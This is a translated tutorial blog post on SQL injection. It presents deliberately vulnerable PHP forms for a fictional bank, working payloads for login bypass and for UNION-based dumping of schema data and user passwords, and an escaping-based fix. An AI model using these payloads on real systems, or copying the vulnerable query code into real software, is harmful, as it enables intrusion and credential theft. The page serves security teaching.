Article Source: https://tienminhvy.com/kinh-nghiem/sql-injection-la-gi-va-cach-phong-tranh
SQL injection is a fairly basic but extremely dangerous error when programming a web application, however, there are many large websites on the Internet that have encountered this serious security error and consequently data leaks. data of millions of users around the world.
It’s inherently difficult to program a website, and to protect it from hackers stalking your website it’s even more difficult, as in the previous post I mentioned data leaks at Flaticon and Freepik and the reasons. of this problem is the SQL injection error.
Why this error is quite basic, but many programmers often make mistakes when programming applications, let’s find out.
What is SQL injection?
SQL injection is a technical error that the programmer accidentally (or may intentionally) create when programming a web application, this is the vulnerability of checking for user input containing signatures. Special order affects the database system.
This allows hackers to pass the data check with just a few special characters. And the result as you know it is causing security issues that lead to unwanted user data leakage. Usually, SQL injection error occurs in: Login / registration form, search form, data lookup form, …
How dangerous is SQL injection?
SQL injection is extremely dangerous, with SQL injection security errors, hackers can take advantage of to steal data in the database of a website. With this error, the hacker can insert data, export the data to the screen and steal it easily, …
In addition, if a hacker is your website’s adversary, that person can execute a command used to delete a lot of important data from the database or delete the entire database of a website, but against a Database is the most important thing when it comes to dynamic website.
An example of a SQL injection error
Example # 1
So you can imagine how the SQL injection error is and how dangerous I have written a small login form for testing as follows (note this form is only for testing purposes):
PHP:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 | <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token comment">// Ví dụ về SQL Injection</span> <span class="token comment">// Bản quyền © 2020 by tienminhvy.com - vui lòng ghi rõ nguồn nếu chia sẻ lại</span> <span class="token variable">$db</span> <span class="token operator">=</span> <span class="token function">mysqli_connect</span> <span class="token punctuation">(</span> <span class="token single-quoted-string string">'localhost'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'root'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'sql_inj'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'3306'</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token operator">!</span> <span class="token variable">$db</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token keyword">die</span> <span class="token punctuation">(</span> <span class="token single-quoted-string string">'Không thể kết nối đến CSDL, hãy kiểm tra lại thông tin'</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token operator"><</span> <span class="token operator"><</span> <span class="token operator"><</span> <span class="token constant">HTML</span> <span class="token operator"><</span> form method <span class="token operator">=</span> <span class="token single-quoted-string string">'POST'</span> <span class="token operator">></span> <span class="token operator"><</span> p <span class="token operator">></span> <span class="token constant">B</span> ạn phải đăng nhập mới có thể tiếp tục sử dụng dịch vụ <span class="token operator">!</span> <span class="token operator"><</span> <span class="token operator">/</span> p <span class="token operator">></span> <span class="token operator"><</span> input type <span class="token operator">=</span> <span class="token double-quoted-string string">"text"</span> name <span class="token operator">=</span> <span class="token double-quoted-string string">"username"</span> placeholder <span class="token operator">=</span> <span class="token single-quoted-string string">'Tên đăng nhập'</span> required <span class="token operator">></span> <span class="token operator"><</span> input type <span class="token operator">=</span> <span class="token double-quoted-string string">"password"</span> name <span class="token operator">=</span> <span class="token double-quoted-string string">"password"</span> placeholder <span class="token operator">=</span> <span class="token single-quoted-string string">'Mật khẩu'</span> required <span class="token operator">></span> <span class="token operator"><</span> button type <span class="token operator">=</span> <span class="token single-quoted-string string">'submit'</span> <span class="token operator">></span> Đăng nhập <span class="token operator"><</span> <span class="token operator">/</span> button <span class="token operator">></span> <span class="token operator"><</span> <span class="token operator">/</span> form <span class="token operator">></span> <span class="token constant">HTML</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token keyword">isset</span> <span class="token punctuation">(</span> <span class="token variable">$_POST</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'username'</span> <span class="token punctuation">]</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token variable">$username</span> <span class="token operator">=</span> <span class="token variable">$_POST</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'username'</span> <span class="token punctuation">]</span> <span class="token punctuation">;</span> <span class="token variable">$password</span> <span class="token operator">=</span> <span class="token variable">$_POST</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'password'</span> <span class="token punctuation">]</span> <span class="token punctuation">;</span> <span class="token variable">$result</span> <span class="token operator">=</span> <span class="token function">mysqli_query</span> <span class="token punctuation">(</span> <span class="token variable">$db</span> <span class="token punctuation">,</span> <span class="token double-quoted-string string">"SELECT * FROM user WHERE username = ' <span class="token interpolation"><span class="token variable">$username</span></span> ' AND password = ' <span class="token interpolation"><span class="token variable">$password</span></span> '"</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token function">mysqli_num_rows</span> <span class="token punctuation">(</span> <span class="token variable">$result</span> <span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">1</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"<p>Đăng nhập thành công</p>"</span> <span class="token punctuation">;</span> <span class="token variable">$content</span> <span class="token punctuation">.</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"<p><b>Thông tin tài khoản</b></p>"</span> <span class="token punctuation">;</span> <span class="token variable">$content</span> <span class="token punctuation">.</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"<p><b>Tên đăng nhập:</b> <span class="token interpolation"><span class="token variable">$username</span></span> </p>"</span> <span class="token punctuation">;</span> <span class="token variable">$content</span> <span class="token punctuation">.</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"<p><b>Số dư tài khoản:</b> 29,194,500đ</p>"</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span> <span class="token variable">$content</span> <span class="token punctuation">.</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"<p><b>Đăng nhập thất bại</b></p>"</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span> <span class="token delimiter important">?></span></span> <span class="token doctype"><!DOCTYPE html></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> html</span> <span class="token attr-name">lang</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> en <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> head</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> meta</span> <span class="token attr-name">charset</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> UTF-8 <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> meta</span> <span class="token attr-name">name</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> viewport <span class="token punctuation">"</span></span> <span class="token attr-name">content</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> width=device-width, initial-scale=1.0 <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> title</span> <span class="token punctuation">></span></span> Ngân hàng XYZ <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> title</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> head</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> body</span> <span class="token punctuation">></span></span> <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token keyword">echo</span> <span class="token variable">$content</span> <span class="token punctuation">;</span> <span class="token delimiter important">?></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> body</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> html</span> <span class="token punctuation">></span></span> |
Start testing
For example, this is the login page of XYZ bank, I know the username of a person named tmv, but he did not give me the password. So when I enter any password, the web server returns as shown below.
And I’m always naughty, so I added the character (‘) to the password box and got the following result:
When the server returns an error in the form of Warning: … then surely this website has SQL Injection vulnerability. Therefore, if I want to log in, I will enter the username and the following command in the password box and click login:
1 2 | ' <span class="token operator">OR</span> <span class="token number">1</span> <span class="token operator">=</span> <span class="token number">1</span> <span class="token comment">--</span> |
And the website will return the following page:
Why is that?
Here, I guess the principle of the SQL statement of this website is as follows:
1 2 | <span class="token keyword">SELECT</span> <span class="token operator">*</span> <span class="token keyword">FROM</span> <span class="token keyword">table</span> <span class="token keyword">WHERE</span> username <span class="token operator">=</span> <span class="token string">'tmv'</span> <span class="token operator">AND</span> password <span class="token operator">=</span> <span class="token string">'matkhau'</span> |
And when I enter the character (‘) after any password in the password box, I will get the following command:
1 2 | <span class="token keyword">SELECT</span> <span class="token operator">*</span> <span class="token keyword">FROM</span> <span class="token keyword">table</span> <span class="token keyword">WHERE</span> username <span class="token operator">=</span> <span class="token string">'tmv'</span> <span class="token operator">AND</span> password <span class="token operator">=</span> <span class="token string">'matkhau'</span> ' |
When executing the above command, the system will issue a Warning: … error as shown above, so I modified the above statement and the received command is:
1 2 | <span class="token keyword">SELECT</span> <span class="token operator">*</span> <span class="token keyword">FROM</span> <span class="token keyword">table</span> <span class="token keyword">WHERE</span> username <span class="token operator">=</span> <span class="token string">'tmv'</span> <span class="token operator">AND</span> password <span class="token operator">=</span> <span class="token string">''</span> <span class="token operator">OR</span> <span class="token number">1</span> <span class="token operator">=</span> <span class="token number">1</span> <span class="token comment">-- '</span> |
Here, when the system checks this statement, there are 3 conditions, username = string, password = string and 1 = 1. By default, when conditional number 1 is true but conditional sentence 2 is incorrect, the system will immediately exit. After the above conversion, it will return TRUE for all cases because TRUE AND FALSE OR TRUE the final result will be TRUE.
Therefore, the system will find the user and obviously will bybass (pass) the password check, so the system returns the user with the same information as shown above without having to go through any checks. both.
Example # 2
With this example, I will get information of all users in the database of the XYZ Bank website. The source code of this page is as follows (for testing purposes only):
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 | <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token comment">// Ví dụ về SQL Injection</span> <span class="token comment">// Bản quyền © 2020 by tienminhvy.com - vui lòng ghi rõ nguồn nếu chia sẻ lại</span> <span class="token variable">$db</span> <span class="token operator">=</span> <span class="token function">mysqli_connect</span> <span class="token punctuation">(</span> <span class="token single-quoted-string string">'localhost'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'root'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'sql_inj'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'3306'</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token operator">!</span> <span class="token variable">$db</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token keyword">die</span> <span class="token punctuation">(</span> <span class="token single-quoted-string string">'Không thể kết nối đến CSDL, hãy kiểm tra lại thông tin'</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token operator"><</span> <span class="token operator"><</span> <span class="token operator"><</span> <span class="token constant">HTML</span> <span class="token operator"><</span> form method <span class="token operator">=</span> <span class="token single-quoted-string string">'POST'</span> <span class="token operator">></span> <span class="token operator"><</span> p <span class="token operator">></span> <span class="token constant">T</span> ìm tin nhắn <span class="token punctuation">.</span> <span class="token constant">H</span> ãy nhập tiêu đề <span class="token operator"><</span> <span class="token operator">/</span> p <span class="token operator">></span> <span class="token operator"><</span> input type <span class="token operator">=</span> <span class="token double-quoted-string string">"text"</span> name <span class="token operator">=</span> <span class="token double-quoted-string string">"tieude"</span> placeholder <span class="token operator">=</span> <span class="token single-quoted-string string">'Tiêu đề cần tìm'</span> required <span class="token operator">></span> <span class="token operator"><</span> button type <span class="token operator">=</span> <span class="token single-quoted-string string">'submit'</span> <span class="token operator">></span> Kiểm tra <span class="token operator"><</span> <span class="token operator">/</span> button <span class="token operator">></span> <span class="token operator"><</span> <span class="token operator">/</span> form <span class="token operator">></span> <span class="token constant">HTML</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token keyword">isset</span> <span class="token punctuation">(</span> <span class="token variable">$_POST</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'tieude'</span> <span class="token punctuation">]</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token variable">$tieude</span> <span class="token operator">=</span> <span class="token variable">$_POST</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'tieude'</span> <span class="token punctuation">]</span> <span class="token punctuation">;</span> <span class="token variable">$result</span> <span class="token operator">=</span> <span class="token function">mysqli_query</span> <span class="token punctuation">(</span> <span class="token variable">$db</span> <span class="token punctuation">,</span> <span class="token double-quoted-string string">"SELECT msg, msg_name FROM msg WHERE msg_name = ' <span class="token interpolation"><span class="token variable">$tieude</span></span> '"</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token function">mysqli_num_rows</span> <span class="token punctuation">(</span> <span class="token variable">$result</span> <span class="token punctuation">)</span> <span class="token operator">></span> <span class="token number">0</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token variable">$content</span> <span class="token punctuation">.</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"<table> <tr> <th>Tiêu đề tin nhắn</th> <th>Nội dung</th> </tr>"</span> <span class="token punctuation">;</span> <span class="token keyword">while</span> <span class="token punctuation">(</span> <span class="token variable">$row</span> <span class="token operator">=</span> <span class="token function">mysqli_fetch_assoc</span> <span class="token punctuation">(</span> <span class="token variable">$result</span> <span class="token punctuation">)</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token variable">$content</span> <span class="token punctuation">.</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"<tr> <td>"</span> <span class="token punctuation">.</span> <span class="token variable">$row</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'msg_name'</span> <span class="token punctuation">]</span> <span class="token punctuation">.</span> <span class="token double-quoted-string string">"</td> <td>"</span> <span class="token punctuation">.</span> <span class="token variable">$row</span> <span class="token punctuation">[</span> <span class="token single-quoted-string string">'msg'</span> <span class="token punctuation">]</span> <span class="token punctuation">.</span> <span class="token double-quoted-string string">"</td> </tr>"</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token variable">$content</span> <span class="token punctuation">.</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"</table>"</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span> <span class="token variable">$content</span> <span class="token punctuation">.</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"<p><b>Không tìm thấy</b></p>"</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token punctuation">}</span> <span class="token delimiter important">?></span></span> <span class="token doctype"><!DOCTYPE html></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> html</span> <span class="token attr-name">lang</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> en <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> head</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> meta</span> <span class="token attr-name">charset</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> UTF-8 <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> meta</span> <span class="token attr-name">name</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> viewport <span class="token punctuation">"</span></span> <span class="token attr-name">content</span> <span class="token attr-value"><span class="token punctuation">=</span> <span class="token punctuation">"</span> width=device-width, initial-scale=1.0 <span class="token punctuation">"</span></span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> title</span> <span class="token punctuation">></span></span> Tin nhắn - Ngân hàng XYZ <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> title</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> head</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"><</span> body</span> <span class="token punctuation">></span></span> <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token keyword">echo</span> <span class="token variable">$content</span> <span class="token punctuation">;</span> <span class="token delimiter important">?></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> body</span> <span class="token punctuation">></span></span> <span class="token tag"><span class="token tag"><span class="token punctuation"></</span> html</span> <span class="token punctuation">></span></span> |
For example, bank XYZ has a page to find bank messages, and if I want to check the bank’s messages, I go to the page above. And I also do the same action as above, enter the character (‘) in the title box to find and click Check.
And the website shows the message below, the website has got SQL injection security error. But this time more specifically, if you enter the correct title, the website will display a list of title and content of the notice. So I guess here the system calls the SQL statement to get the value of two columns as follows.
1 2 | <span class="token keyword">SELECT</span> table_1 <span class="token punctuation">,</span> table_2 <span class="token keyword">FROM</span> <span class="token keyword">table</span> <span class="token keyword">WHERE</span> input <span class="token operator">=</span> <span class="token string">'giatri'</span> |
Therefore, I will enter the following statement in the box:
1 2 3 4 5 6 7 8 | <span class="token comment">-- Câu lệnh nhập vào ô:</span> <span class="token string">' UNION ( SELECT table_name, table_schema FROM information_schema.tables ) -- -- Sẽ chuyển thành -- SELECT table_1, table_2 FROM table WHERE input='' UNION ( SELECT table_name, table_schema FROM information_schema.tables ) -- '</span> |
After entering, I press test to execute the command.
And we have received the following list, with the above statement, we already know how many tables are in a database on that SQL database system. To check the database that the website is currently connected to, scroll down to the bottom of the list.
And below, right where the last keyword phpmyadmin and the beginning of a new line with 2 lines, those 2 rows are the current 2 tables in the database named sql_inj
In the user table there will be login information for all users on this website. But one thing is that I still do not know how many columns in the user table can be obtained because if all are taken with an asterisk (*), the system will error.
So, I’ll type the following in the box and press Enter:
1 2 3 4 5 6 7 8 | <span class="token comment">-- Câu lệnh nhập vào ô:</span> <span class="token string">' UNION ( SELECT column_name, 1 FROM information_schema.columns WHERE table_name='</span> <span class="token keyword">user</span> <span class="token string">' ) -- -- Sẽ chuyển thành -- SELECT table_1, table_2 FROM table WHERE input='' UNION ( SELECT column_name, 1 FROM information_schema.columns WHERE table_name='</span> <span class="token keyword">user</span> <span class="token string">' ) -- '</span> |
In the above statement, I chose 2 columns, column_name and 1 because by default, the system chose 2 columns to process the request, so if you choose more or less, the system will report an error.
After executing the above command, I get the list as shown below. As you can see, there are countless columns in the user table of the whole database system, here I predict that the two bolded lines are the columns of the user table in the sql_inj database.
And to get a list of information in this user table, I enter the following command in the box and press Enter:
1 2 3 4 5 6 7 8 | <span class="token comment">-- Câu lệnh nhập vào ô:</span> <span class="token string">' UNION ( SELECT username, password FROM user ) -- -- Sẽ chuyển thành -- SELECT table_1, table_2 FROM table WHERE input='' UNION ( SELECT username, password FROM user ) -- '</span> |
And we have successfully retrieved the list of users in the user table already.
How to prevent SQL injection vulnerability
As you can see above, the SQL injection vulnerability is extremely dangerous because it makes it possible for hackers to manipulate the database directly without having to verify any steps.
Fortunately, the majority of current programming languages already support functions to be able to escape the statement (adding asterisk () before special characters) before executing it on the database, thus will be limited and probably will safely block SQL injection vulnerabilities.
And the current PHP programming language supports many functions for this, most notably mysqli_real_escape_string (), with this function, the system will use the syntax of the database system to escape command strings into standard SQL statements. .
To be able to use this command, refer to the code below:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | <span class="token php language-php"><span class="token delimiter important"><?php</span> <span class="token variable">$db</span> <span class="token operator">=</span> <span class="token function">mysqli_connect</span> <span class="token punctuation">(</span> <span class="token single-quoted-string string">'localhost'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'root'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">''</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'sql_inj'</span> <span class="token punctuation">,</span> <span class="token single-quoted-string string">'3306'</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token keyword">if</span> <span class="token punctuation">(</span> <span class="token operator">!</span> <span class="token variable">$db</span> <span class="token punctuation">)</span> <span class="token punctuation">{</span> <span class="token keyword">die</span> <span class="token punctuation">(</span> <span class="token single-quoted-string string">'Không thể kết nối đến CSDL, hãy kiểm tra lại thông tin'</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token punctuation">}</span> <span class="token variable">$chuoiCanEscape</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"test'"</span> <span class="token punctuation">;</span> <span class="token variable">$chuoiDaEscape</span> <span class="token operator">=</span> <span class="token function">mysqli_real_escape_string</span> <span class="token punctuation">(</span> <span class="token variable">$db</span> <span class="token punctuation">,</span> <span class="token variable">$chuoiCanEscape</span> <span class="token punctuation">)</span> <span class="token punctuation">;</span> <span class="token variable">$caulenh</span> <span class="token operator">=</span> <span class="token double-quoted-string string">"SELECT * FROM table WHERE username=' <span class="token interpolation"><span class="token variable">$chuoiDaEscape</span></span> '"</span> <span class="token punctuation">;</span> <span class="token comment">// Câu lệnh sẽ trở thành SELECT * FROM table WHERE username='</span> test <span class="token single-quoted-string string">''</span> <span class="token delimiter important">?></span></span> |
As you can see, the command has been escaped and is safe to execute.
Summary
In summary, through this article, you have understood what SQL injection is, how dangerous it is and how to prevent it. Note that please apply the above mentioned solution to all forms when you program your website, and remember the unwritten rule that “Never trust user input!”.
Good luck.